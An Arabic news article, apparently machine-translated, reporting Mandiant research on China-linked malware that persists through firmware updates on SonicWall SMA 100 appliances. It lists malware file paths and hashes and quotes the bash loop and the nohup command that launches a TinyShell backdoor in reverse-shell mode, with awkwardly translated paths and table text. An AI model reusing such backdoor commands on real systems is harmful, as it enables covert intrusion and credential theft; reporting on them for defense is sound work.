أخبار التقنية

تنجو البرامج الضارة التي تصيب أجهزة الأمان المستخدمة على نطاق واسع من تحديثات البرامج الثابتة


قال باحثون إن جهات التهديد المرتبطة بالحكومة الصينية تصيب جهاز أمان مستخدمًا على نطاق واسع من SonicWall ببرامج ضارة تظل نشطة حتى بعد أن يتلقى الجهاز تحديثات البرامج الثابتة.

SonicWall’s Secure Mobile Access 100 هو جهاز آمن للوصول عن بعد يساعد المؤسسات على نشر القوى العاملة عن بعد بشكل آمن. يستخدمه العملاء لمنح عناصر تحكم وصول دقيقة للمستخدمين البعيدين ، وتوفير اتصالات VPN لشبكات المؤسسة ، وتعيين ملفات تعريف فريدة لكل موظف. إن وصول SMA 100 إلى شبكات العملاء يجعله هدفًا جذابًا للجهات الفاعلة في التهديد.

في عام 2021 ، تعرض الجهاز للهجوم من قبل متسللين متطورين استغلوا ما كان في ذلك الحين ثغرة يوم الصفر. تعرضت أجهزة الأمن من Fortinet و Pulse Secure لهجمات مماثلة في السنوات الأخيرة.

اكتساب ثبات طويل الأمد داخل الشبكات

يوم الخميس ، نشرت شركة الأمن Mandiant تقريرًا قال إن الجهات الفاعلة في التهديد التي يشتبه في ارتباطها بالصين تشارك في حملة للحفاظ على استمرارية طويلة الأمد من خلال تشغيل برامج ضارة على أجهزة SonicWall SMA غير المصححة. تميزت الحملة بقدرة البرامج الضارة على البقاء على الأجهزة حتى بعد أن تلقت البرامج الثابتة الخاصة بها برامج ثابتة جديدة.

كتب باحثو مانديانت دانيال لي وستيفن إيكلز وبن ريد: “بذل المهاجمون جهدًا كبيرًا في استقرار واستمرار أدواتهم”. “يسمح هذا لوصولهم إلى الشبكة بالاستمرار من خلال تحديثات البرامج الثابتة والحفاظ على موطئ قدم على الشبكة من خلال جهاز SonicWall.”

لتحقيق هذا الاستمرارية ، يتحقق البرنامج الضار من ترقيات البرامج الثابتة المتاحة كل 10 ثوانٍ. عندما يتوفر تحديث ، يقوم البرنامج الضار بنسخ الملف المؤرشف للنسخ الاحتياطي ، ويفك ضغطه ، ويثبته ، ثم ينسخ حزمة الملفات الضارة بالكامل إليه. تضيف البرامج الضارة أيضًا مستخدمًا جذريًا خلفيًا إلى الملف الذي تم تحميله. بعد ذلك ، تعيد البرامج الضارة ضغط الملف حتى يكون جاهزًا للتثبيت.

كتب الباحثون: “هذه التقنية ليست معقدة بشكل خاص ، لكنها تُظهر جهدًا كبيرًا من جانب المهاجم لفهم دورة تحديث الجهاز ، ثم تطوير واختبار طريقة للمثابرة”.

تتوافق تقنيات المثابرة مع حملة هجوم في عام 2021 استخدمت فيها 16 عائلة من البرامج الضارة لإصابة أجهزة Pulse Secure. أرجع مانديانت الهجمات إلى مجموعات تهديد متعددة ، بما في ذلك تلك التي تم تعقبها باسم UNC2630 ، UNC2717 ، والتي قالت الشركة إنها تدعم “الأولويات الرئيسية للحكومة الصينية”. أرجع مانديانت الهجمات المستمرة ضد عملاء SonicWall SMA 100 إلى مجموعة تم تتبعها باسم UNC4540.

“في السنوات الأخيرة ، نشر المهاجمون الصينيون العديد من عمليات الاستغلال والبرامج الضارة في يوم الصفر لمجموعة متنوعة من أجهزة الشبكة التي تواجه الإنترنت كطريق للتطفل الكامل على المؤسسة ، والمثال الذي تم الإبلاغ عنه هنا هو جزء من نمط حديث تتوقع Mandiant استمراره مع على المدى القريب ، كتب باحثو مانديانت في تقرير يوم الخميس.

وصول ذو امتيازات عالية

يبدو أن الغرض الرئيسي من البرنامج الضار هو سرقة كلمات المرور المشفرة لجميع المستخدمين الذين قاموا بتسجيل الدخول. كما يوفر أيضًا قشرة ويب يمكن أن يستخدمها ممثل التهديد لتثبيت برامج ضارة جديدة.

وكتب الباحثون في تقرير يوم الخميس: “كشف تحليل جهاز مخترق عن مجموعة من الملفات التي منحت المهاجم وصولاً ذا امتيازات عالية ومتاح إلى الجهاز”. تتكون البرامج الضارة من سلسلة من نصوص bash وثنائي ELF واحد تم تحديده على أنه متغير TinyShell. يُظهر السلوك العام لمجموعة نصوص bash الخبيثة فهماً مفصلاً للجهاز ومصمم جيدًا للنظام لتوفير الاستقرار والمثابرة “.

قائمة البرامج الضارة هي:

طريقتجزئةوظيفة
/ بن / جدار الحمايةe4117b17e3d14fe64f45750be71dbaa6عملية البرمجيات الخبيثة الرئيسية
/ بن / httpsd2d57bcb8351cf2b57c4fd2d1bb8f862eTinyShell مستتر
/etc/rc.d/rc.local559b9ae2a578e1258e80c45a5794c071استمرار التمهيد لجدار الحماية د
/ بن / iptabled8dbf1effa7bc94fc0b9b4ce83dfce2e6عملية البرامج الضارة الرئيسية الزائدة عن الحاجة
/ bin / geoBotnetd619769d3d40a3c28ec83832ca521f521البرنامج النصي مستتر البرامج الثابتة
/ bin / ifconfig6fa1bf2e427b2defffd573854c35d4919رشيقة البرنامج النصي الاغلاق

وتابع التقرير:

نقطة إدخال البرامج الضارة الرئيسية هي نص برمجي bash مسمى firewalldالذي ينفذ الحلقة الأساسية مرة واحدة لعدد كل ملف على النظام التربيعي: …for j in $(ls / -R) do for i in $(ls / -R) do:… البرنامج النصي مسؤول عن تنفيذ أمر SQL لإنجاز سرقة بيانات الاعتماد وتنفيذ المكونات الأخرى.

الوظيفة الأولى في firewalld ينفذ الباب الخلفي TinyShell httpsd بأمر nohup /bin/httpsd -c -d 5 -m -1 -p 51432 > /dev/null 2>&1 & إذا كان httpsd العملية لا تعمل بالفعل. يؤدي هذا إلى تعيين TinyShell إلى وضع shell العكسي ، وإرشادها إلى الاتصال بعنوان IP والمنفذ المذكورين أعلاه في وقت ويوم محددين يمثلهما -m العلم ، مع فاصل منارة محدد بواسطة -d علَم. يقوم الثنائي بتضمين عنوان IP مشفر الثابت ، والذي يتم استخدامه في وضع الغلاف العكسي إذا تم ترك وسيطة عنوان IP فارغة. كما أن لديها وضع صدفة استماع متاح.

قال الباحثون إنهم لا يعرفون ما هو ناقل العدوى الأولي.

في الأسبوع الماضي ، نشرت SonicWall نصيحة حثت مستخدمي SMA 100 على الترقية إلى الإصدار 10.2.1.7 أو أعلى. تتضمن هذه الإصدارات تحسينات مثل مراقبة تكامل الملفات وتحديد العمليات الشاذة. التصحيح متاح هنا. يجب على المستخدمين أيضًا مراجعة السجلات بانتظام بحثًا عن علامات الاختراق ، بما في ذلك عمليات تسجيل الدخول غير الطبيعية أو حركة المرور الداخلية.

مقالات ذات صلة

اترك تعليقاً

لن يتم نشر عنوان بريدك الإلكتروني. الحقول الإلزامية مشار إليها بـ *

زر الذهاب إلى الأعلى